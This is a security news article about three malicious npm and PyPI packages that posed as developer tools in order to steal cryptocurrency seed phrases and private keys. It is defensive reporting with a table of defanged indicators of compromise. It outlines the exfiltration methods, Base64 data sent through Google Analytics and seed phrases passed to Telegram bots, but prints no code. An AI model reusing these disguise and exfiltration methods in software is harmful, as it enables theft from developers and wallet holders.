Friday, May 9, 2025
Homecyber securityThreat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential...

Threat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential Theft

Published on

SIEM as a Service

Follow Us on Google News

The Socket Threat Research Team has unearthed a trio of malicious packages, two hosted on the Python Package Index (PyPI) and one on the npm registry, designed to silently pilfer cryptocurrency secrets, including mnemonic seed phrases and private keys.

Released between 2021 and 2024, these packages, under the guise of harmless developer tools, have been downloaded thousands of times, showcasing a growing trend in software supply chain attacks targeting open-source ecosystems.

Subtle Subversion in Open Source

The npm package react-native-scrollpageviewtest, masquerading as a page-scrolling helper, has been downloaded 1215 times.

- Advertisement - Google News

Its modus operandi involves an intricate combination of obfuscation and evasion techniques.

Once installed, it dynamically loads the host React Native wallet engine to extract sensitive data, which is then encoded in Base64 and stealthily exfiltrated to the control server using Google Analytics as a seemingly innocuous endpoint for data transmission.

This method not only evades detection but also leverages the trust placed in Google’s analytics services.

On PyPI, web3x and herewalletbot represent similar tactics but with nuanced delivery mechanisms.

Web3x, appearing as an Ethereum balance checker, has gained over 3400 downloads.

It tricks users into providing their seed phrases by offering to check wallet balances and subsequently sends the stolen credentials to a Telegram bot controlled by the attackers.

Herewalletbot, with 3425 downloads, automates the process even further by guiding users through a Telegram chat interface where they are prompted to enter their mnemonic seed phrase, which is then harvested without their knowledge.

The Deceptive Dance with Developers

According to the Report, these packages illustrate the sophistication and cunning nature of current cyber threats.

By embedding themselves into development tools and workflows, they position themselves to intercept the most sensitive information, leveraging the inherent trust developers place in open-source packages.

This breach not only compromises individual developers but poses systemic risks to organizations relying on these ecosystems for software development.

The ongoing presence of these packages on npm and PyPI until recently highlights a critical need for enhanced security protocols within the software supply chain.

Developers and organizations must adopt proactive security measures like source-code review, runtime behavior monitoring, and dependency analysis to safeguard against such threats.

This discovery serves as a stark reminder of the critical importance of vigilance in software component usage.

Developers are urged to never share their mnemonic seed phrase and private keys under any circumstances, as these are the keys to their digital assets.

Any package requesting such information should be immediately flagged as suspicious and reported.

Indicators of Compromise (IOCs)

Malicious PackageAliasDownloadsEmail/Endpoint
react-native-scrollpageviewtesttwoplus1,215twoplusten@163[.]com
web3xtonymevbots3,405xeallmail@mitico[.]org
herewalletbotvannszs3,425bevansatria@gmail[.]com, @herewalletbot, hxxps://web[.]telegram[.]org/k/#@herewalletbot

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

UK Government to Shift Away from Passwords in New Security Move

UK government has unveiled plans to implement passkey technology across its digital services later...

Europol Dismantles DDoS-for-Hire Network and Arrests Four Administrators

Significant blow to cybercriminal infrastructure, Europol has coordinated an international operation resulting in the...

Play Ransomware Deployed in the Wild Exploiting Windows 0-Day Vulnerability

Patched Windows zero-day vulnerability (CVE-2025-29824) in the Common Log File System (CLFS) driver was...

New Advanced Phishing Attack Exploits Discord to Target Crypto Users

Check Point Research has uncovered a sophisticated phishing campaign that leverages Discord to target...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

UK Government to Shift Away from Passwords in New Security Move

UK government has unveiled plans to implement passkey technology across its digital services later...

Europol Dismantles DDoS-for-Hire Network and Arrests Four Administrators

Significant blow to cybercriminal infrastructure, Europol has coordinated an international operation resulting in the...

Play Ransomware Deployed in the Wild Exploiting Windows 0-Day Vulnerability

Patched Windows zero-day vulnerability (CVE-2025-29824) in the Common Log File System (CLFS) driver was...